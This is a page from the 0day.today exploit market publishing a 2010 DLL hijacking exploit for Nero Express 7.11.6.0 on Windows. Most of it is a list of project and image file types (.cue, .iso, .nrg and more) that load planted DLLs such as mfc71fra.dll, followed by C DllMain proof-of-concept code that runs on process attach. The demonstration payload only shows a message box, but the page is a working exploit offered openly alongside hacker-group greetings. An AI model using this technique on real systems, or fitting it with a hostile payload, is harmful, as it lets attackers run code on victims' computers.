[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Nero Express 7.11.6.0 DLL Hijacking Exploit

Author
indoushka
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-14351
Category
local exploits
Date add
04-10-2010
Platform
windows
===========================================
Nero Express 7.11.6.0 DLL Hijacking Exploit
===========================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    #######################################           1
0                    I'm indoushka member from Inj3ct0r Team           1
1                    #######################################           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

######################################################################## 

# Vendor: http://www.nero.com/

# Date: 2010-07-27 

# Author : indoushka 

# Thanks to : Dz-Ghost Team

# Contact : 00213771818860

# Tested on : windows SP2 Francais V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                                                                                                
# Exploit By indoushka 
-------------
wvs.exe
-------
exploited nero.exe with exploit.cue using mfc71fra.dll
exploited nero.exe with exploit.cue using mfc71loc.dll
exploited nero.exe with exploit.cue using bcgpoleacc.dll
exploited nero.exe with exploit.iso using mfc71fra.dll
exploited nero.exe with exploit.iso using mfc71loc.dll
exploited nero.exe with exploit.nhf using mfc71fra.dll
exploited nero.exe with exploit.nhf using mfc71loc.dll
exploited nero.exe with exploit.nhv using mfc71fra.dll
exploited nero.exe with exploit.nhv using mfc71loc.dll
exploited nero.exe with exploit.nmd using mfc71fra.dll
exploited nero.exe with exploit.nmd using mfc71loc.dll
exploited nero.exe with exploit.nmd using bcgpoleacc.dll
exploited nero.exe with exploit.nr3 using mfc71fra.dll
exploited nero.exe with exploit.nr3 using mfc71loc.dll
exploited nero.exe with exploit.nr3 using bcgpoleacc.dll
exploited nero.exe with exploit.nr4 using mfc71fra.dll
exploited nero.exe with exploit.nr4 using mfc71loc.dll
exploited nero.exe with exploit.nr4 using bcgpoleacc.dll
exploited nero.exe with exploit.nra using mfc71fra.dll
exploited nero.exe with exploit.nra using mfc71loc.dll
exploited nero.exe with exploit.nra using bcgpoleacc.dll
exploited nero.exe with exploit.nrb using mfc71fra.dll
exploited nero.exe with exploit.nrb using mfc71loc.dll
exploited nero.exe with exploit.nrb using bcgpoleacc.dll
exploited nero.exe with exploit.nrc using mfc71fra.dll
exploited nero.exe with exploit.nrc using mfc71loc.dll
exploited nero.exe with exploit.nrc using bcgpoleacc.dll
exploited nero.exe with exploit.nrd using mfc71fra.dll
exploited nero.exe with exploit.nrd using mfc71loc.dll
exploited nero.exe with exploit.nrd using bcgpoleacc.dll
exploited nero.exe with exploit.nre using mfc71fra.dll
exploited nero.exe with exploit.nre using mfc71loc.dll
exploited nero.exe with exploit.nre using bcgpoleacc.dll
exploited nero.exe with exploit.nrg using mfc71fra.dll
exploited nero.exe with exploit.nrg using mfc71loc.dll
exploited nero.exe with exploit.nrg using bcgpoleacc.dll
exploited nero.exe with exploit.nrh using mfc71fra.dll
exploited nero.exe with exploit.nrh using mfc71loc.dll
exploited nero.exe with exploit.nrh using bcgpoleacc.dll
exploited nero.exe with exploit.nri using mfc71fra.dll
exploited nero.exe with exploit.nri using mfc71loc.dll
exploited nero.exe with exploit.nri using bcgpoleacc.dll
exploited nero.exe with exploit.nrj using mfc71fra.dll
exploited nero.exe with exploit.nrj using mfc71loc.dll
exploited nero.exe with exploit.nrj using bcgpoleacc.dll
exploited nero.exe with exploit.nrm using mfc71fra.dll
exploited nero.exe with exploit.nrm using mfc71loc.dll
exploited nero.exe with exploit.nrm using bcgpoleacc.dll
exploited nero.exe with exploit.nrs using mfc71fra.dll
exploited nero.exe with exploit.nrs using mfc71loc.dll
exploited nero.exe with exploit.nrs using bcgpoleacc.dll
exploited nero.exe with exploit.nru using mfc71fra.dll
exploited nero.exe with exploit.nru using mfc71loc.dll
exploited nero.exe with exploit.nru using bcgpoleacc.dll
exploited nero.exe with exploit.nrv using mfc71fra.dll
exploited nero.exe with exploit.nrv using mfc71loc.dll
exploited nero.exe with exploit.nrv using bcgpoleacc.dll
exploited nero.exe with exploit.nrw using mfc71fra.dll
exploited nero.exe with exploit.nrw using mfc71loc.dll
exploited nero.exe with exploit.nrw using bcgpoleacc.dll
exploited nero.exe with exploit.nsd using mfc71fra.dll
exploited nero.exe with exploit.nsd using mfc71loc.dll
exploited nero.exe with exploit.nsd using bcgpoleacc.dll
-------------
#include "stdafx.h"
#include "stdlib.h"
void init() {
MessageBox(NULL,"indoushka", "Hack3d",0x00000003);
}
 
 
BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
 )
{
    switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
 init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
 case DLL_PROCESS_DETACH:
break;
    }
    return TRUE;
}

Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller 
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net 
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te 
---------------------------------------------------------------------------------------------------------------------------------



#  0day.today [2024-11-16]  #